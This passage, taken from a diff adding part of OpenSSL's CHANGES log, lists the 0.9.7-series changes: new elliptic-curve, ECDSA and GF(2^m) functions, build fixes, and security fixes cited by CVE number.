+  *) New function EC_GROUP_get_degree, which is defined through
+     EC_METHOD.  For curves over prime fields, this returns the bit
+     length of the modulus.
+
+     [Sheueling Chang Shantz and Douglas Stebila
+     (Sun Microsystems Laboratories)]
+
+  *) New functions EC_GROUP_dup, EC_POINT_dup.
+     (These simply call ..._new  and ..._copy).
+
+     [Sheueling Chang Shantz and Douglas Stebila
+     (Sun Microsystems Laboratories)]
+
+  *) Add binary polynomial arithmetic software in crypto/bn/bn_gf2m.c.
+     Polynomials are represented as BIGNUMs (where the sign bit is not
+     used) in the following functions [macros]:  
+
+          BN_GF2m_add
+          BN_GF2m_sub             [= BN_GF2m_add]
+          BN_GF2m_mod             [wrapper for BN_GF2m_mod_arr]
+          BN_GF2m_mod_mul         [wrapper for BN_GF2m_mod_mul_arr]
+          BN_GF2m_mod_sqr         [wrapper for BN_GF2m_mod_sqr_arr]
+          BN_GF2m_mod_inv
+          BN_GF2m_mod_exp         [wrapper for BN_GF2m_mod_exp_arr]
+          BN_GF2m_mod_sqrt        [wrapper for BN_GF2m_mod_sqrt_arr]
+          BN_GF2m_mod_solve_quad  [wrapper for BN_GF2m_mod_solve_quad_arr]
+          BN_GF2m_cmp             [= BN_ucmp]
+
+     (Note that only the 'mod' functions are actually for fields GF(2^m).
+     BN_GF2m_add() is misnomer, but this is for the sake of consistency.)
+
+     For some functions, an the irreducible polynomial defining a
+     field can be given as an 'unsigned int[]' with strictly
+     decreasing elements giving the indices of those bits that are set;
+     i.e., p[] represents the polynomial
+          f(t) = t^p[0] + t^p[1] + ... + t^p[k]
+     where
+          p[0] > p[1] > ... > p[k] = 0.
+     This applies to the following functions:
+
+          BN_GF2m_mod_arr
+          BN_GF2m_mod_mul_arr
+          BN_GF2m_mod_sqr_arr
+          BN_GF2m_mod_inv_arr        [wrapper for BN_GF2m_mod_inv]
+          BN_GF2m_mod_div_arr        [wrapper for BN_GF2m_mod_div]
+          BN_GF2m_mod_exp_arr
+          BN_GF2m_mod_sqrt_arr
+          BN_GF2m_mod_solve_quad_arr
+          BN_GF2m_poly2arr
+          BN_GF2m_arr2poly
+
+     Conversion can be performed by the following functions:
+
+          BN_GF2m_poly2arr
+          BN_GF2m_arr2poly
+
+     bntest.c has additional tests for binary polynomial arithmetic.
+
+     Two implementations for BN_GF2m_mod_div() are available.
+     The default algorithm simply uses BN_GF2m_mod_inv() and
+     BN_GF2m_mod_mul().  The alternative algorithm is compiled in only
+     if OPENSSL_SUN_GF2M_DIV is defined (patent pending; read the
+     copyright notice in crypto/bn/bn_gf2m.c before enabling it).
+
+     [Sheueling Chang Shantz and Douglas Stebila
+     (Sun Microsystems Laboratories)]
+
+  *) Add new error code 'ERR_R_DISABLED' that can be used when some
+     functionality is disabled at compile-time.
+     [Douglas Stebila <douglas.stebila@sun.com>]
+
+  *) Change default behaviour of 'openssl asn1parse' so that more
+     information is visible when viewing, e.g., a certificate:
+
+     Modify asn1_parse2 (crypto/asn1/asn1_par.c) so that in non-'dump'
+     mode the content of non-printable OCTET STRINGs is output in a
+     style similar to INTEGERs, but with '[HEX DUMP]' prepended to
+     avoid the appearance of a printable string.
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Add 'asn1_flag' and 'asn1_form' member to EC_GROUP with access
+     functions
+          EC_GROUP_set_asn1_flag()
+          EC_GROUP_get_asn1_flag()
+          EC_GROUP_set_point_conversion_form()
+          EC_GROUP_get_point_conversion_form()
+     These control ASN1 encoding details:
+     - Curves (i.e., groups) are encoded explicitly unless asn1_flag
+       has been set to OPENSSL_EC_NAMED_CURVE.
+     - Points are encoded in uncompressed form by default; options for
+       asn1_for are as for point2oct, namely
+          POINT_CONVERSION_COMPRESSED
+          POINT_CONVERSION_UNCOMPRESSED
+          POINT_CONVERSION_HYBRID
+
+     Also add 'seed' and 'seed_len' members to EC_GROUP with access
+     functions
+          EC_GROUP_set_seed()
+          EC_GROUP_get0_seed()
+          EC_GROUP_get_seed_len()
+     This is used only for ASN1 purposes (so far).
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Add 'field_type' member to EC_METHOD, which holds the NID
+     of the appropriate field type OID.  The new function
+     EC_METHOD_get_field_type() returns this value.
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Add functions 
+          EC_POINT_point2bn()
+          EC_POINT_bn2point()
+          EC_POINT_point2hex()
+          EC_POINT_hex2point()
+     providing useful interfaces to EC_POINT_point2oct() and
+     EC_POINT_oct2point().
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Change internals of the EC library so that the functions
+          EC_GROUP_set_generator()
+          EC_GROUP_get_generator()
+          EC_GROUP_get_order()
+          EC_GROUP_get_cofactor()
+     are implemented directly in crypto/ec/ec_lib.c and not dispatched
+     to methods, which would lead to unnecessary code duplication when
+     adding different types of curves.
+     [Nils Larsch <nla@trustcenter.de> with input by Bodo Moeller]
+
+  *) Implement compute_wNAF (crypto/ec/ec_mult.c) without BIGNUM
+     arithmetic, and such that modified wNAFs are generated
+     (which avoid length expansion in many cases).
+     [Bodo Moeller]
+
+  *) Add a function EC_GROUP_check_discriminant() (defined via
+     EC_METHOD) that verifies that the curve discriminant is non-zero.
+
+     Add a function EC_GROUP_check() that makes some sanity tests
+     on a EC_GROUP, its generator and order.  This includes
+     EC_GROUP_check_discriminant().
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Add ECDSA in new directory crypto/ecdsa/.
+
+     Add applications 'openssl ecparam' and 'openssl ecdsa'
+     (these are based on 'openssl dsaparam' and 'openssl dsa').
+
+     ECDSA support is also included in various other files across the
+     library.  Most notably,
+     - 'openssl req' now has a '-newkey ecdsa:file' option;
+     - EVP_PKCS82PKEY (crypto/evp/evp_pkey.c) now can handle ECDSA;
+     - X509_PUBKEY_get (crypto/asn1/x_pubkey.c) and
+       d2i_PublicKey (crypto/asn1/d2i_pu.c) have been modified to make
+       them suitable for ECDSA where domain parameters must be
+       extracted before the specific public key;
+     - ECDSA engine support has been added.
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Include some named elliptic curves, and add OIDs from X9.62,
+     SECG, and WAP/WTLS.  Each curve can be obtained from the new
+     function
+          EC_GROUP_new_by_curve_name(),
+     and the list of available named curves can be obtained with
+          EC_get_builtin_curves().
+     Also add a 'curve_name' member to EC_GROUP objects, which can be
+     accessed via
+         EC_GROUP_set_curve_name()
+         EC_GROUP_get_curve_name()
+     [Nils Larsch <larsch@trustcenter.de, Bodo Moeller]
+ 
+  *) Remove a few calls to bn_wexpand() in BN_sqr() (the one in there
+     was actually never needed) and in BN_mul().  The removal in BN_mul()
+     required a small change in bn_mul_part_recursive() and the addition
+     of the functions bn_cmp_part_words(), bn_sub_part_words() and
+     bn_add_part_words(), which do the same thing as bn_cmp_words(),
+     bn_sub_words() and bn_add_words() except they take arrays with
+     differing sizes.
+     [Richard Levitte]
+
+ Changes between 0.9.7l and 0.9.7m  [23 Feb 2007]
+
+  *) Cleanse PEM buffers before freeing them since they may contain 
+     sensitive data.
+     [Benjamin Bennett <ben@psc.edu>]
+
+  *) Include "!eNULL" in SSL_DEFAULT_CIPHER_LIST to make sure that
+     a ciphersuite string such as "DEFAULT:RSA" cannot enable
+     authentication-only ciphersuites.
+     [Bodo Moeller]
+
+  *) Since AES128 and AES256 share a single mask bit in the logic of
+     ssl/ssl_ciph.c, the code for masking out disabled ciphers needs a
+     kludge to work properly if AES128 is available and AES256 isn't.
+     [Victor Duchovni]
+
+  *) Expand security boundary to match 1.1.1 module.
+     [Steve Henson]
+
+  *) Remove redundant features: hash file source, editing of test vectors
+     modify fipsld to use external fips_premain.c signature.
+     [Steve Henson]
+
+  *) New perl script mkfipsscr.pl to create shell scripts or batch files to
+     run algorithm test programs.
+     [Steve Henson]
+
+  *) Make algorithm test programs more tolerant of whitespace.
+     [Steve Henson]
+
+  *) Have SSL/TLS server implementation tolerate "mismatched" record
+     protocol version while receiving ClientHello even if the
+     ClientHello is fragmented.  (The server can't insist on the
+     particular protocol version it has chosen before the ServerHello
+     message has informed the client about his choice.)
+     [Bodo Moeller]
+
+  *) Load error codes if they are not already present instead of using a
+     static variable. This allows them to be cleanly unloaded and reloaded.
+     [Steve Henson]
+
+ Changes between 0.9.7k and 0.9.7l  [28 Sep 2006]
+
+  *) Introduce limits to prevent malicious keys being able to
+     cause a denial of service.  (CVE-2006-2940)
+     [Steve Henson, Bodo Moeller]
+
+  *) Fix ASN.1 parsing of certain invalid structures that can result
+     in a denial of service.  (CVE-2006-2937)  [Steve Henson]
+
+  *) Fix buffer overflow in SSL_get_shared_ciphers() function. 
+     (CVE-2006-3738) [Tavis Ormandy and Will Drewry, Google Security Team]
+
+  *) Fix SSL client code which could crash if connecting to a
+     malicious SSLv2 server.  (CVE-2006-4343)
+     [Tavis Ormandy and Will Drewry, Google Security Team]
+
+  *) Change ciphersuite string processing so that an explicit
+     ciphersuite selects this one ciphersuite (so that "AES256-SHA"
+     will no longer include "AES128-SHA"), and any other similar
+     ciphersuite (same bitmap) from *other* protocol versions (so that
+     "RC4-MD5" will still include both the SSL 2.0 ciphersuite and the
+     SSL 3.0/TLS 1.0 ciphersuite).  This is a backport combining
+     changes from 0.9.8b and 0.9.8d.
+     [Bodo Moeller]
+
+ Changes between 0.9.7j and 0.9.7k  [05 Sep 2006]
+
+  *) Avoid PKCS #1 v1.5 signature attack discovered by Daniel Bleichenbacher
+     (CVE-2006-4339)  [Ben Laurie and Google Security Team]
+
+  *) Change the Unix randomness entropy gathering to use poll() when
+     possible instead of select(), since the latter has some
+     undesirable limitations.
+     [Darryl Miles via Richard Levitte and Bodo Moeller]
+
+  *) Disable rogue ciphersuites:
+
+      - SSLv2 0x08 0x00 0x80 ("RC4-64-MD5")
+      - SSLv3/TLSv1 0x00 0x61 ("EXP1024-RC2-CBC-MD5")
+      - SSLv3/TLSv1 0x00 0x60 ("EXP1024-RC4-MD5")
+
+     The latter two were purportedly from
+     draft-ietf-tls-56-bit-ciphersuites-0[01].txt, but do not really
+     appear there.
+
+     Also deactive the remaining ciphersuites from
+     draft-ietf-tls-56-bit-ciphersuites-01.txt.  These are just as
+     unofficial, and the ID has long expired.
+     [Bodo Moeller]
+
+  *) Fix RSA blinding Heisenbug (problems sometimes occured on
+     dual-core machines) and other potential thread-safety issues.
+     [Bodo Moeller]
+
+ Changes between 0.9.7i and 0.9.7j  [04 May 2006]
+
+  *) Adapt fipsld and the build system to link against the validated FIPS
+     module in FIPS mode.
+     [Steve Henson]
+
+  *) Fixes for VC++ 2005 build under Windows.
+     [Steve Henson]
+
+  *) Add new Windows build target VC-32-GMAKE for VC++. This uses GNU make 
+     from a Windows bash shell such as MSYS. It is autodetected from the
+     "config" script when run from a VC++ environment. Modify standard VC++
+     build to use fipscanister.o from the GNU make build. 
+     [Steve Henson]
+
+ Changes between 0.9.7h and 0.9.7i  [14 Oct 2005]
+
+  *) Wrapped the definition of EVP_MAX_MD_SIZE in a #ifdef OPENSSL_FIPS.
+     The value now differs depending on if you build for FIPS or not.
+     BEWARE!  A program linked with a shared FIPSed libcrypto can't be
+     safely run with a non-FIPSed libcrypto, as it may crash because of
+     the difference induced by this change.
+     [Andy Polyakov]
+
+ Changes between 0.9.7g and 0.9.7h  [11 Oct 2005]
+
+  *) Remove the functionality of SSL_OP_MSIE_SSLV2_RSA_PADDING
+     (part of SSL_OP_ALL).  This option used to disable the
+     countermeasure against man-in-the-middle protocol-version
+     rollback in the SSL 2.0 server implementation, which is a bad
+     idea.  (CVE-2005-2969)
+
+     [Bodo Moeller; problem pointed out by Yutaka Oiwa (Research Center
+     for Information Security, National Institute of Advanced Industrial
+     Science and Technology [AIST], Japan)]
+
+  *) Minimal support for X9.31 signatures and PSS padding modes. This is
+     mainly for FIPS compliance and not fully integrated at this stage.
+     [Steve Henson]
+
+  *) For DSA signing, unless DSA_FLAG_NO_EXP_CONSTTIME is set, perform
+     the exponentiation using a fixed-length exponent.  (Otherwise,
+     the information leaked through timing could expose the secret key
+     after many signatures; cf. Bleichenbacher's attack on DSA with
+     biased k.)
+     [Bodo Moeller]
+
+  *) Make a new fixed-window mod_exp implementation the default for
+     RSA, DSA, and DH private-key operations so that the sequence of
+     squares and multiplies and the memory access pattern are
+     independent of the particular secret key.  This will mitigate
+     cache-timing and potential related attacks.
+
+     BN_mod_exp_mont_consttime() is the new exponentiation implementation,
+     and this is automatically used by BN_mod_exp_mont() if the new flag
+     BN_FLG_EXP_CONSTTIME is set for the exponent.  RSA, DSA, and DH
+     will use this BN flag for private exponents unless the flag
+     RSA_FLAG_NO_EXP_CONSTTIME, DSA_FLAG_NO_EXP_CONSTTIME, or
+     DH_FLAG_NO_EXP_CONSTTIME, respectively, is set.
+
+     [Matthew D Wood (Intel Corp), with some changes by Bodo Moeller]
+
+  *) Change the client implementation for SSLv23_method() and
+     SSLv23_client_method() so that is uses the SSL 3.0/TLS 1.0
+     Client Hello message format if the SSL_OP_NO_SSLv2 option is set.
+     (Previously, the SSL 2.0 backwards compatible Client Hello
+     message format would be used even with SSL_OP_NO_SSLv2.)
+     [Bodo Moeller]
+
+  *) Add support for smime-type MIME parameter in S/MIME messages which some
+     clients need.
+     [Steve Henson]
+
+  *) New function BN_MONT_CTX_set_locked() to set montgomery parameters in
+     a threadsafe manner. Modify rsa code to use new function and add calls
+     to dsa and dh code (which had race conditions before).
+     [Steve Henson]
+
+  *) Include the fixed error library code in the C error file definitions
+     instead of fixing them up at runtime. This keeps the error code
+     structures constant.
+     [Steve Henson]
+
+ Changes between 0.9.7f and 0.9.7g  [11 Apr 2005]
+
+  [NB: OpenSSL 0.9.7h and later 0.9.7 patch levels were released after
+  OpenSSL 0.9.8.]
+
+  *) Fixes for newer kerberos headers. NB: the casts are needed because
+     the 'length' field is signed on one version and unsigned on another
+     with no (?) obvious way to tell the difference, without these VC++
+     complains. Also the "definition" of FAR (blank) is no longer included
+     nor is the error ENOMEM. KRB5_PRIVATE has to be set to 1 to pick up
+     some needed definitions.
+     [Steve Henson]
+
+  *) Undo Cygwin change.
+     [Ulf Möller]
+
+  *) Added support for proxy certificates according to RFC 3820.
+     Because they may be a security thread to unaware applications,
+     they must be explicitely allowed in run-time.  See
+     docs/HOWTO/proxy_certificates.txt for further information.
+     [Richard Levitte]
+
+ Changes between 0.9.7e and 0.9.7f  [22 Mar 2005]
+
+  *) Use (SSL_RANDOM_VALUE - 4) bytes of pseudo random data when generating
+     server and client random values. Previously
+     (SSL_RANDOM_VALUE - sizeof(time_t)) would be used which would result in
+     less random data when sizeof(time_t) > 4 (some 64 bit platforms).
+
+     This change has negligible security impact because:
+
+     1. Server and client random values still have 24 bytes of pseudo random
+        data.
+
+     2. Server and client random values are sent in the clear in the initial
+        handshake.
+
+     3. The master secret is derived using the premaster secret (48 bytes in
+        size for static RSA ciphersuites) as well as client server and random
+        values.
+
+     The OpenSSL team would like to thank the UK NISCC for bringing this issue
+     to our attention. 
+
+     [Stephen Henson, reported by UK NISCC]
+
+  *) Use Windows randomness collection on Cygwin.
+     [Ulf Möller]
+
+  *) Fix hang in EGD/PRNGD query when communication socket is closed
+     prematurely by EGD/PRNGD.
+     [Darren Tucker <dtucker@zip.com.au> via Lutz Jänicke, resolves #1014]
+
+  *) Prompt for pass phrases when appropriate for PKCS12 input format.
+     [Steve Henson]
+
+  *) Back-port of selected performance improvements from development
+     branch, as well as improved support for PowerPC platforms.
+     [Andy Polyakov]
+
+  *) Add lots of checks for memory allocation failure, error codes to indicate
+     failure and freeing up memory if a failure occurs.
+     [Nauticus Networks SSL Team <openssl@nauticusnet.com>, Steve Henson]
+
+  *) Add new -passin argument to dgst.
+     [Steve Henson]
+
+  *) Perform some character comparisons of different types in X509_NAME_cmp:
+     this is needed for some certificates that reencode DNs into UTF8Strings
+     (in violation of RFC3280) and can't or wont issue name rollover
+     certificates.
+     [Steve Henson]
+
+  *) Make an explicit check during certificate validation to see that
+     the CA setting in each certificate on the chain is correct.  As a
+     side effect always do the following basic checks on extensions,
+     not just when there's an associated purpose to the check:
+
+      - if there is an unhandled critical extension (unless the user
+        has chosen to ignore this fault)
+      - if the path length has been exceeded (if one is set at all)
+      - that certain extensions fit the associated purpose (if one has
+        been given)
+     [Richard Levitte]
+
+ Changes between 0.9.7d and 0.9.7e  [25 Oct 2004]
+
+  *) Avoid a race condition when CRLs are checked in a multi threaded 
+     environment. This would happen due to the reordering of the revoked
+     entries during signature checking and serial number lookup. Now the
+     encoding is cached and the serial number sort performed under a lock.
+     Add new STACK function sk_is_sorted().
+     [Steve Henson]
+
+  *) Add Delta CRL to the extension code.
+     [Steve Henson]
+
+  *) Various fixes to s3_pkt.c so alerts are sent properly.
+     [David Holmes <d.holmes@f5.com>]
+
+  *) Reduce the chances of duplicate issuer name and serial numbers (in
+     violation of RFC3280) using the OpenSSL certificate creation utilities.
+     This is done by creating a random 64 bit value for the initial serial
+     number when a serial number file is created or when a self signed
+     certificate is created using 'openssl req -x509'. The initial serial
+     number file is created using 'openssl x509 -next_serial' in CA.pl
+     rather than being initialized to 1.
+     [Steve Henson]
+
+ Changes between 0.9.7c and 0.9.7d  [17 Mar 2004]
+
+  *) Fix null-pointer assignment in do_change_cipher_spec() revealed           
+     by using the Codenomicon TLS Test Tool (CVE-2004-0079)                    
+     [Joe Orton, Steve Henson]   
+
+  *) Fix flaw in SSL/TLS handshaking when using Kerberos ciphersuites
+     (CVE-2004-0112)
+     [Joe Orton, Steve Henson]   
+
+  *) Make it possible to have multiple active certificates with the same
+     subject in the CA index file.  This is done only if the keyword
+     'unique_subject' is set to 'no' in the main CA section (default
+     if 'CA_default') of the configuration file.  The value is saved
+     with the database itself in a separate index attribute file,
+     named like the index file with '.attr' appended to the name.
+     [Richard Levitte]
+
+  *) X509 verify fixes. Disable broken certificate workarounds when 
+     X509_V_FLAGS_X509_STRICT is set. Check CRL issuer has cRLSign set if
+     keyUsage extension present. Don't accept CRLs with unhandled critical
+     extensions: since verify currently doesn't process CRL extensions this
+     rejects a CRL with *any* critical extensions. Add new verify error codes
+     for these cases.
+     [Steve Henson]
+
+  *) When creating an OCSP nonce use an OCTET STRING inside the extnValue.
+     A clarification of RFC2560 will require the use of OCTET STRINGs and 
+     some implementations cannot handle the current raw format. Since OpenSSL
+     copies and compares OCSP nonces as opaque blobs without any attempt at
+     parsing them this should not create any compatibility issues.
+     [Steve Henson]
+
+  *) New md flag EVP_MD_CTX_FLAG_REUSE this allows md_data to be reused when
+     calling EVP_MD_CTX_copy_ex() to avoid calling OPENSSL_malloc(). Without
+     this HMAC (and other) operations are several times slower than OpenSSL
+     < 0.9.7.
+     [Steve Henson]
+
+  *) Print out GeneralizedTime and UTCTime in ASN1_STRING_print_ex().
+     [Peter Sylvester <Peter.Sylvester@EdelWeb.fr>]
+
+  *) Use the correct content when signing type "other".
+     [Steve Henson]
+
+ Changes between 0.9.7b and 0.9.7c  [30 Sep 2003]
+
+  *) Fix various bugs revealed by running the NISCC test suite:
+
+     Stop out of bounds reads in the ASN1 code when presented with
+     invalid tags (CVE-2003-0543 and CVE-2003-0544).
+     
+     Free up ASN1_TYPE correctly if ANY type is invalid (CVE-2003-0545).
+
+     If verify callback ignores invalid public key errors don't try to check
+     certificate signature with the NULL public key.
+
+     [Steve Henson]
+
+  *) New -ignore_err option in ocsp application to stop the server
+     exiting on the first error in a request.
+     [Steve Henson]
+
+  *) In ssl3_accept() (ssl/s3_srvr.c) only accept a client certificate
+     if the server requested one: as stated in TLS 1.0 and SSL 3.0
+     specifications.
+     [Steve Henson]
+
+  *) In ssl3_get_client_hello() (ssl/s3_srvr.c), tolerate additional
+     extra data after the compression methods not only for TLS 1.0
+     but also for SSL 3.0 (as required by the specification).
+     [Bodo Moeller; problem pointed out by Matthias Loepfe]
+
+  *) Change X509_certificate_type() to mark the key as exported/exportable
+     when it's 512 *bits* long, not 512 bytes.
+     [Richard Levitte]
+
+  *) Change AES_cbc_encrypt() so it outputs exact multiple of
+     blocks during encryption.
+     [Richard Levitte]
+
+  *) Various fixes to base64 BIO and non blocking I/O. On write 
+     flushes were not handled properly if the BIO retried. On read
+     data was not being buffered properly and had various logic bugs.
+     This also affects blocking I/O when the data being decoded is a
+     certain size.
+     [Steve Henson]
+
+  *) Various S/MIME bugfixes and compatibility changes:
+     output correct application/pkcs7 MIME type if
+     PKCS7_NOOLDMIMETYPE is set. Tolerate some broken signatures.
+     Output CR+LF for EOL if PKCS7_CRLFEOL is set (this makes opening
+     of files as .eml work). Correctly handle very long lines in MIME
+     parser.
+     [Steve Henson]
+
+ Changes between 0.9.7a and 0.9.7b  [10 Apr 2003]
+
+  *) Countermeasure against the Klima-Pokorny-Rosa extension of
+     Bleichbacher's attack on PKCS #1 v1.5 padding: treat
+     a protocol version number mismatch like a decryption error
+     in ssl3_get_client_key_exchange (ssl/s3_srvr.c).
+     [Bodo Moeller]
+
+  *) Turn on RSA blinding by default in the default implementation
+     to avoid a timing attack. Applications that don't want it can call
+     RSA_blinding_off() or use the new flag RSA_FLAG_NO_BLINDING.
+     They would be ill-advised to do so in most cases.
+     [Ben Laurie, Steve Henson, Geoff Thorpe, Bodo Moeller]
+
+  *) Change RSA blinding code so that it works when the PRNG is not
+     seeded (in this case, the secret RSA exponent is abused as
+     an unpredictable seed -- if it is not unpredictable, there
+     is no point in blinding anyway).  Make RSA blinding thread-safe
+     by remembering the creator's thread ID in rsa->blinding and
+     having all other threads use local one-time blinding factors
+     (this requires more computation than sharing rsa->blinding, but
+     avoids excessive locking; and if an RSA object is not shared
+     between threads, blinding will still be very fast).
+     [Bodo Moeller]
+
+  *) Fixed a typo bug that would cause ENGINE_set_default() to set an
+     ENGINE as defaults for all supported algorithms irrespective of
+     the 'flags' parameter. 'flags' is now honoured, so applications
+     should make sure they are passing it correctly.
+     [Geoff Thorpe]
+
+  *) Target "mingw" now allows native Windows code to be generated in
+     the Cygwin environment as well as with the MinGW compiler.
+     [Ulf Moeller] 
+
+ Changes between 0.9.7 and 0.9.7a  [19 Feb 2003]
+
+  *) In ssl3_get_record (ssl/s3_pkt.c), minimize information leaked
+     via timing by performing a MAC computation even if incorrrect
+     block cipher padding has been found.  This is a countermeasure
+     against active attacks where the attacker has to distinguish
+     between bad padding and a MAC verification error. (CVE-2003-0078)
+
+     [Bodo Moeller; problem pointed out by Brice Canvel (EPFL),
+     Alain Hiltgen (UBS), Serge Vaudenay (EPFL), and
+     Martin Vuagnoux (EPFL, Ilion)]
+
+  *) Make the no-err option work as intended.  The intention with no-err
+     is not to have the whole error stack handling routines removed from
+     libcrypto, it's only intended to remove all the function name and
+     reason texts, thereby removing some of the footprint that may not
+     be interesting if those errors aren't displayed anyway.
+
+     NOTE: it's still possible for any application or module to have it's
+     own set of error texts inserted.  The routines are there, just not
+     used by default when no-err is given.
+     [Richard Levitte]
+
+  *) Add support for FreeBSD on IA64.
+     [dirk.meyer@dinoex.sub.org via Richard Levitte, resolves #454]
+
+  *) Adjust DES_cbc_cksum() so it returns the same value as the MIT
+     Kerberos function mit_des_cbc_cksum().  Before this change,
+     the value returned by DES_cbc_cksum() was like the one from
+     mit_des_cbc_cksum(), except the bytes were swapped.
+     [Kevin Greaney <Kevin.Greaney@hp.com> and Richard Levitte]
+
+  *) Allow an application to disable the automatic SSL chain building.
+     Before this a rather primitive chain build was always performed in
+     ssl3_output_cert_chain(): an application had no way to send the 
+     correct chain if the automatic operation produced an incorrect result.
+
+     Now the chain builder is disabled if either:
+
+     1. Extra certificates are added via SSL_CTX_add_extra_chain_cert().
+
+     2. The mode flag SSL_MODE_NO_AUTO_CHAIN is set.
+
+     The reasoning behind this is that an application would not want the
+     auto chain building to take place if extra chain certificates are
+     present and it might also want a means of sending no additional
+     certificates (for example the chain has two certificates and the
+     root is omitted).
+     [Steve Henson]
+
+  *) Add the possibility to build without the ENGINE framework.
+     [Steven Reddie <smr@essemer.com.au> via Richard Levitte]
+
+  *) Under Win32 gmtime() can return NULL: check return value in
+     OPENSSL_gmtime(). Add error code for case where gmtime() fails.
+     [Steve Henson]
+
+  *) DSA routines: under certain error conditions uninitialized BN objects
+     could be freed. Solution: make sure initialization is performed early
+     enough. (Reported and fix supplied by Ivan D Nestlerode <nestler@MIT.EDU>,
+     Nils Larsch <nla@trustcenter.de> via PR#459)
+     [Lutz Jaenicke]
+
+  *) Another fix for SSLv2 session ID handling: the session ID was incorrectly
+     checked on reconnect on the client side, therefore session resumption
+     could still fail with a "ssl session id is different" error. This
+     behaviour is masked when SSL_OP_ALL is used due to
+     SSL_OP_MICROSOFT_SESS_ID_BUG being set.
+     Behaviour observed by Crispin Flowerday <crispin@flowerday.cx> as
+     followup to PR #377.
+     [Lutz Jaenicke]
+
+  *) IA-32 assembler support enhancements: unified ELF targets, support
+     for SCO/Caldera platforms, fix for Cygwin shared build.
+     [Andy Polyakov]
+
+  *) Add support for FreeBSD on sparc64.  As a consequence, support for
+     FreeBSD on non-x86 processors is separate from x86 processors on
+     the config script, much like the NetBSD support.
+     [Richard Levitte & Kris Kennaway <kris@obsecurity.org>]
+
+ Changes between 0.9.6h and 0.9.7  [31 Dec 2002]
+
+  [NB: OpenSSL 0.9.6i and later 0.9.6 patch levels were released after
+  OpenSSL 0.9.7.]
+
+  *) Fix session ID handling in SSLv2 client code: the SERVER FINISHED
+     code (06) was taken as the first octet of the session ID and the last
+     octet was ignored consequently. As a result SSLv2 client side session
+     caching could not have worked due to the session ID mismatch between
+     client and server.
+     Behaviour observed by Crispin Flowerday <crispin@flowerday.cx> as
+     PR #377.
+     [Lutz Jaenicke]
+
+  *) Change the declaration of needed Kerberos libraries to use EX_LIBS
+     instead of the special (and badly supported) LIBKRB5.  LIBKRB5 is
+     removed entirely.
+     [Richard Levitte]
+
+  *) The hw_ncipher.c engine requires dynamic locks.  Unfortunately, it
+     seems that in spite of existing for more than a year, many application
+     author have done nothing to provide the necessary callbacks, which
+     means that this particular engine will not work properly anywhere.
+     This is a very unfortunate situation which forces us, in the name
+     of usability, to give the hw_ncipher.c a static lock, which is part
+     of libcrypto.
+     NOTE: This is for the 0.9.7 series ONLY.  This hack will never
+     appear in 0.9.8 or later.  We EXPECT application authors to have
+     dealt properly with this when 0.9.8 is released (unless we actually
+     make such changes in the libcrypto locking code that changes will
+     have to be made anyway).
+     [Richard Levitte]
+
+  *) In asn1_d2i_read_bio() repeatedly call BIO_read() until all content
+     octets have been read, EOF or an error occurs. Without this change
+     some truncated ASN1 structures will not produce an error.
+     [Steve Henson]
+
+  *) Disable Heimdal support, since it hasn't been fully implemented.
+     Still give the possibility to force the use of Heimdal, but with
+     warnings and a request that patches get sent to openssl-dev.
+     [Richard Levitte]
+
+  *) Add the VC-CE target, introduce the WINCE sysname, and add
+     INSTALL.WCE and appropriate conditionals to make it build.
+     [Steven Reddie <smr@essemer.com.au> via Richard Levitte]
+
+  *) Change the DLL names for Cygwin to cygcrypto-x.y.z.dll and
+     cygssl-x.y.z.dll, where x, y and z are the major, minor and
+     edit numbers of the version.
+     [Corinna Vinschen <vinschen@redhat.com> and Richard Levitte]
+
+  *) Introduce safe string copy and catenation functions
+     (BUF_strlcpy() and BUF_strlcat()).
+     [Ben Laurie (CHATS) and Richard Levitte]
+
+  *) Avoid using fixed-size buffers for one-line DNs.
+     [Ben Laurie (CHATS)]
+
+  *) Add BUF_MEM_grow_clean() to avoid information leakage when
+     resizing buffers containing secrets, and use where appropriate.
+     [Ben Laurie (CHATS)]
+
+  *) Avoid using fixed size buffers for configuration file location.
+     [Ben Laurie (CHATS)]
+
+  *) Avoid filename truncation for various CA files.
+     [Ben Laurie (CHATS)]
+
+  *) Use sizeof in preference to magic numbers.
+     [Ben Laurie (CHATS)]
+
+  *) Avoid filename truncation in cert requests.
+     [Ben Laurie (CHATS)]
+
+  *) Add assertions to check for (supposedly impossible) buffer
+     overflows.
+     [Ben Laurie (CHATS)]
+
+  *) Don't cache truncated DNS entries in the local cache (this could
+     potentially lead to a spoofing attack).
+     [Ben Laurie (CHATS)]
+
+  *) Fix various buffers to be large enough for hex/decimal
+     representations in a platform independent manner.
+     [Ben Laurie (CHATS)]
+
+  *) Add CRYPTO_realloc_clean() to avoid information leakage when
+     resizing buffers containing secrets, and use where appropriate.
+     [Ben Laurie (CHATS)]
+
+  *) Add BIO_indent() to avoid much slightly worrying code to do
+     indents.
+     [Ben Laurie (CHATS)]
+
+  *) Convert sprintf()/BIO_puts() to BIO_printf().
+     [Ben Laurie (CHATS)]
+
+  *) buffer_gets() could terminate with the buffer only half
+     full. Fixed.
+     [Ben Laurie (CHATS)]
+
+  *) Add assertions to prevent user-supplied crypto functions from
+     overflowing internal buffers by having large block sizes, etc.
+     [Ben Laurie (CHATS)]
+
+  *) New OPENSSL_assert() macro (similar to assert(), but enabled
+     unconditionally).
+     [Ben Laurie (CHATS)]
+
+  *) Eliminate unused copy of key in RC4.
+     [Ben Laurie (CHATS)]
+
+  *) Eliminate unused and incorrectly sized buffers for IV in pem.h.
+     [Ben Laurie (CHATS)]
+
+  *) Fix off-by-one error in EGD path.
+     [Ben Laurie (CHATS)]
+
+  *) If RANDFILE path is too long, ignore instead of truncating.
+     [Ben Laurie (CHATS)]
+
+  *) Eliminate unused and incorrectly sized X.509 structure
+     CBCParameter.
+     [Ben Laurie (CHATS)]
+
+  *) Eliminate unused and dangerous function knumber().
+     [Ben Laurie (CHATS)]
+
+  *) Eliminate unused and dangerous structure, KSSL_ERR.
+     [Ben Laurie (CHATS)]
+
+  *) Protect against overlong session ID context length in an encoded
+     session object. Since these are local, this does not appear to be
+     exploitable.
+     [Ben Laurie (CHATS)]
+
+  *) Change from security patch (see 0.9.6e below) that did not affect
+     the 0.9.6 release series:
+
+     Remote buffer overflow in SSL3 protocol - an attacker could
